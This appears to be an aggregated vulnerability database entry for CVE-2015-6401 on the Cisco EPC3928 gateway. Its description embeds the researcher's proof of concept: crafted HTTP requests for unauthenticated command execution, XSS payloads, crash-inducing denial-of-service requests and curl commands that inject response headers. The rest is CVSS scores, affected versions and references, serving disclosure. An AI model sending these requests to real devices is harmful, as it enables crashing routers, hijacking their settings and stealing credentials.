Sign-up

ID

VAR-201512-0408


CVE

CVE-2015-6401


TITLE

Cisco Model EPC3928 with EDVA Vulnerabilities that bypass authentication requests on devices

Trust: 0.8

sources: JVNDB: JVNDB-2015-006400

DESCRIPTION

Cisco EPC3928 devices with EDVA 5.5.10, 5.5.11, and 5.7.1 allow remote attackers to bypass an intended authentication requirement and execute unspecified administrative functions via a crafted HTTP request, aka Bug ID CSCux24941. The Cisco EPC3928 devices are a wireless router product from Cisco. Cisco Wireless Residential Gateway is prone to an arbitrary command-execution vulnerability. Exploiting this issue could allow an attacker to execute subset of commands as administrator. This issue being tracked by Cisco Bug ID CSCux24941. Variants of this product can also be affected. Using combination of several vulnerabilities, attacker is able to remotely download and decode boot configuration file, which you can see on PoC video below. The attacker is also able to reconfigure device in order to perform attacks on the home-user, inject additional data to modem http response or extract sensitive informations from the device, such as the Wi-Fi key. Until Cisco releases workarounds or patches, we recommend verify access to the web-based management panel and make sure that it is not reachable from the external network. Vulnerabilities: 1) Unauthorized Command Execution 2) Gateway Stored XSS 3) Gateway Client List DoS 4) Gateway Reflective XSS 5) Gateway HTTP Corruption DoS 6) "Stored" HTTP Response Injection 7) Boot Information Disclosure ======== PoC: - Unathorized Command Execution #1 - Channel selection request: POST /goform/ChannelsSelection HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/ChannelsSelection.asp Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 24 SAHappyUpstreamChannel=3 #1 - Response: HTTP/1.0 200 OK Server: PS HTTP Server Content-type: text/html Connection: close <html lang="en"><head><title>RELOAD</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script language="javascript" type="text/javascript" src="../active.js"></script><script language="javascript" type="text/javascript" src="../lang.js"></script><script language="javascript" type="text/javascript">var totaltime=120;function time(){document.formnow.hh.value=(" "+totaltime+" Seconds ");totaltime--;} function refreshStatus(){window.setTimeout("window.parent.location.href='http://192.168.1.1'",totaltime*1000);}mytime=setInterval('time()',1000);</script></head><body BGCOLOR="#CCCCCC" TEXT=black><form name="formnow"><HR><h1><script language="javascript" type="text/javascript">dw(msg_goform34);</script><a href="http://192.168.1.1/index.asp"><script language="javascript" type="text/javascript">dw(msg_goform35);</script></a><script language="javascript">refreshStatus();</script><input type="text" name="hh" style="background-color:#CCCCCC;font-size:36;border:n one"></h1></form></body></html> #2 - Clear logs request: POST /goform/Docsis_log HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Docsis_log.asp Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 41 BtnClearLog=Clear+Log&SnmpClearEventLog=0 #2 - Response: HTTP/1.0 302 Redirect Server: PS HTTP Server Location: http://192.168.1.1/Docsis_log.asp Content-type: text/html Connection: close - Gateway Stored and Reflective Cross Site Scripting Example #1: #1 \x96 Stored XSS via username change request: POST /goform/Administration HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Administration.asp Cookie: Lang=en; SessionID=2719880 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 165 working_mode=0&sysname=<script>alert('XSS')</script>&sysPasswd=home&sysConfirmPasswd=home&save=Save+Settings&preWorkingMode=1&h_wlan_enable=enable&h_user_type=common #1 \x96 Response: HTTP/1.0 302 Redirect Server: PS HTTP Server Location: http://192.168.1.1/Administration.asp Content-type: text/html Connection: close #2 \x96 Redirect request: GET /Administration.asp HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Administration.asp Cookie: Lang=en; SessionID=2719880 DNT: 1 Connection: keep-alive #2 \x96 Response: HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Content-Length: 15832 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en"> <head> (...) <tr> <td> <script language="javascript" type="text/javascript">dw(usertype);</script> </td> <td nowrap> <script>alert('XSS')</script> </TD> </tr> <tr> (...) Example #2: #1 \x96 Reflected XSS via client list request: POST /goform/WClientMACList HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: 192.168.1.1/WClientMACList.asp Cookie: Lang=en; SessionID=109660 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 62 sortWireless=mac&h_sortWireless=mac" onmouseover=alert(1) x="y #1 \x96 Response: HTTP/1.0 302 Redirect Server: PS HTTP Server Location: 192.168.1.1/WClientMACList.asp Content-type: text/html Connection: close #2 \x96 Redirect request: GET /WClientMACList.asp HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: 192.168.1.1/WClientMACList.asp Cookie: Lang=en; SessionID=109660 Connection: keep-alive #2 \x96 Reponse: HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Content-Length: 7385 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en"> <head> (...) </table> </div> <input type="hidden" name="h_sortWireless" value="mac" onmouseover=alert(1) x="y" /> </form> </body> </html> (...) - Gateway Client List Denial of Service Device will crash after sending following request. # HTTP Request POST /goform/WClientMACList HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/WClientMACList.asp Cookie: Lang=en; SessionID=109660 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 62 sortWireless=mac&h_sortWireless=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX - Gateway HTTP Corruption Denial of Service Device will crash after sending following request. # HTTP Request POST /goform/Docsis_system HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.1/Docsis_system.asp Cookie: Lang=en; SessionID=348080 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 106 username_login=&password_login=&LanguageSelect=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&Language_Submit=0&login=Log+In - "Stored" HTTP Response Injection It is able to inject additional HTTP data to response, if string parameter of LanguageSelect won't be too long (in that case device will crash). Additional data will be stored in device memory and returned with every http response on port 80 until reboot. devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10 HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Content-Length: 1469 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html lang="en"> devil@hell:~$ curl --data "username_login=&password_login=&LanguageSelect=en%0d%0aSet-Cookie: w00t&Language_Submit=0&login=Log+In" http://192.168.1.1/goform/Docsis_system -s > /dev/null devil@hell:~$ curl -gi http://192.168.1.1/ -s | head -10 HTTP/1.1 200 OK Content-type: text/html Expires: Thu, 3 Oct 1968 12:00:00 GMT Pragma: no-cache Cache-Control: no-cache, must-revalidate Connection: close Set-Cookie: Lang=en Set-Cookie: w00t Set-Cookie: SessionID=657670 Content-Length: 1469 - Boot Information Disclosure In early booting phase, for a short period of time some administrator functions can be executed, and it is able to extract device configuration file. We wrote an exploit that crash the modem, and then retrieve and decode config in order to obtain users credentials. Exploit video PoC: https://www.youtube.com/watch?v=PHSx0s7Turo ======== CVE References: CVE-2015-6401 CVE-2015-6402 CVE-2016-1328 CVE-2016-1336 CVE-2016-1337 Cisco Bug ID\x92s: CSCux24935 CSCux24938 CSCux24941 CSCux24948 CSCuy28100 CSCux17178 Read more on our blog: http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/

Trust: 2.61

sources: NVD: CVE-2015-6401 // JVNDB: JVNDB-2015-006400 // CNVD: CNVD-2015-08384 // BID: 79037 // VULHUB: VHN-84362 // PACKETSTORM: 137379

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2015-08384

AFFECTED PRODUCTS

vendor:ciscomodel:epc3928 docsis 3.0 8x4 wireless residential gateway with embedded digital voice adapterscope:eqversion:5.5.10

Trust: 1.6

vendor:ciscomodel:epc3928 docsis 3.0 8x4 wireless residential gateway with embedded digital voice adapterscope:eqversion:5.5.11

Trust: 1.6

vendor:ciscomodel:epc3928 docsis 3.0 8x4 wireless residential gateway with embedded digital voice adapterscope:eqversion:5.7.1

Trust: 1.6

vendor:ciscomodel:model epc3928 docsis 3.0 8x4 wireless residential gateway with edvascope:eqversion:5.5.10

Trust: 0.8

vendor:ciscomodel:model epc3928 docsis 3.0 8x4 wireless residential gateway with edvascope:eqversion:5.5.11

Trust: 0.8

vendor:ciscomodel:model epc3928 docsis 3.0 8x4 wireless residential gateway with edvascope:eqversion:5.7.1

Trust: 0.8

vendor:ciscomodel:epc3928 devices with edvascope:eqversion:5.5.10

Trust: 0.6

vendor:ciscomodel:epc3928 devices with edvascope:eqversion:5.5.11

Trust: 0.6

vendor:ciscomodel:epc3928 devices with edvascope:eqversion:5.7.1

Trust: 0.6

vendor:ciscomodel:model epc3928 docsis wireless residential gatewayscope:eqversion:3.08x40

Trust: 0.3

sources: CNVD: CNVD-2015-08384 // BID: 79037 // JVNDB: JVNDB-2015-006400 // CNNVD: CNNVD-201512-403 // NVD: CVE-2015-6401

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-6401
value: HIGH

Trust: 1.0

NVD: CVE-2015-6401
value: HIGH

Trust: 0.8

CNVD: CNVD-2015-08384
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201512-403
value: HIGH

Trust: 0.6

VULHUB: VHN-84362
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2015-6401
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2015-08384
severity: MEDIUM
baseScore: 6.4
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:N
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 10.0
impactScore: 4.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-84362
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CNVD: CNVD-2015-08384 // VULHUB: VHN-84362 // JVNDB: JVNDB-2015-006400 // CNNVD: CNNVD-201512-403 // NVD: CVE-2015-6401

PROBLEMTYPE DATA

problemtype:CWE-287

Trust: 1.9

sources: VULHUB: VHN-84362 // JVNDB: JVNDB-2015-006400 // NVD: CVE-2015-6401

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201512-403

TYPE

authorization issue

Trust: 0.6

sources: CNNVD: CNNVD-201512-403

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2015-006400

EXPLOIT AVAILABILITY
sources:
            
            
            VULHUB: VHN-84362

PATCH
title:cisco-sa-20151208-cwrurl:http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20151208-cwr
Trust: 0.8
sources:
            
            
            JVNDB: JVNDB-2015-006400

EXTERNAL IDS
db:NVDid:CVE-2015-6401
Trust: 3.5
db:EXPLOIT-DBid:39904
Trust: 1.1
db:SECTRACKid:1034347
Trust: 1.1
db:JVNDBid:JVNDB-2015-006400
Trust: 0.8
db:CNNVDid:CNNVD-201512-403
Trust: 0.7
db:CNVDid:CNVD-2015-08384
Trust: 0.6
db:BIDid:79037
Trust: 0.4
db:PACKETSTORMid:137379
Trust: 0.2
db:VULHUBid:VHN-84362
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2015-08384 // 
            
            
            
            VULHUB: VHN-84362 // 
            
            
            
            BID: 79037 // 
            
            
            
            JVNDB: JVNDB-2015-006400 // 
            
            
            
            PACKETSTORM: 137379 // 
            
            
            
            CNNVD: CNNVD-201512-403 // 
            
            
            
            NVD: CVE-2015-6401

REFERENCES
url:http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20151208-cwr
Trust: 2.3
url:https://www.exploit-db.com/exploits/39904/
Trust: 1.1
url:http://www.securitytracker.com/id/1034347
Trust: 1.1
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-6401
Trust: 0.8
url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-6401
Trust: 0.8
url:http://www.cisco.com/
Trust: 0.4
url:http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20151217-pnsc
Trust: 0.3
url:http://192.168.1.1/index.asp"><script
Trust: 0.1
url:http://192.168.1.1/administration.asp
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2016-1336
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2016-1337
Trust: 0.1
url:http://192.168.1.1/docsis_system.asp
Trust: 0.1
url:http://192.168.1.1/goform/docsis_system
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2015-6401
Trust: 0.1
url:http://secorda.com/multiple-security-vulnerabilities-affecting-cisco-epc3928/
Trust: 0.1
url:http://192.168.1.1/channelsselection.asp
Trust: 0.1
url:https://www.youtube.com/watch?v=phsx0s7turo
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2015-6402
Trust: 0.1
url:http://192.168.1.1/docsis_log.asp
Trust: 0.1
url:http://192.168.1.1/
Trust: 0.1
url:http://192.168.1.1/wclientmaclist.asp
Trust: 0.1
url:http://secorda.com/)
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2016-1328
Trust: 0.1
url:http://192.168.1.1'",totaltime*1000);}mytime=setinterval('time()',1000);</script></head><body
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2015-08384 // 
            
            
            
            VULHUB: VHN-84362 // 
            
            
            
            BID: 79037 // 
            
            
            
            JVNDB: JVNDB-2015-006400 // 
            
            
            
            PACKETSTORM: 137379 // 
            
            
            
            CNNVD: CNNVD-201512-403 // 
            
            
            
            NVD: CVE-2015-6401

CREDITS
Patryk Bogdan
Trust: 0.4
sources:
            
            
            BID: 79037 // 
            
            
            
            PACKETSTORM: 137379

SOURCES
db:CNVDid:CNVD-2015-08384
db:VULHUBid:VHN-84362
db:BIDid:79037
db:JVNDBid:JVNDB-2015-006400
db:PACKETSTORMid:137379
db:CNNVDid:CNNVD-201512-403
db:NVDid:CVE-2015-6401

LAST UPDATE DATE
2025-04-13T23:17:53.912000+00:00

SOURCES UPDATE DATE
db:CNVDid:CNVD-2015-08384date:2015-12-22T00:00:00
db:VULHUBid:VHN-84362date:2017-09-13T00:00:00
db:BIDid:79037date:2015-12-08T00:00:00
db:JVNDBid:JVNDB-2015-006400date:2015-12-16T00:00:00
db:CNNVDid:CNNVD-201512-403date:2015-12-18T00:00:00
db:NVDid:CVE-2015-6401date:2025-04-12T10:46:40.837

SOURCES RELEASE DATE
db:CNVDid:CNVD-2015-08384date:2015-12-22T00:00:00
db:VULHUBid:VHN-84362date:2015-12-14T00:00:00
db:BIDid:79037date:2015-12-08T00:00:00
db:JVNDBid:JVNDB-2015-006400date:2015-12-16T00:00:00
db:PACKETSTORMid:137379date:2016-06-08T13:22:22
db:CNNVDid:CNNVD-201512-403date:2015-12-14T00:00:00
db:NVDid:CVE-2015-6401date:2015-12-14T03:59:01.510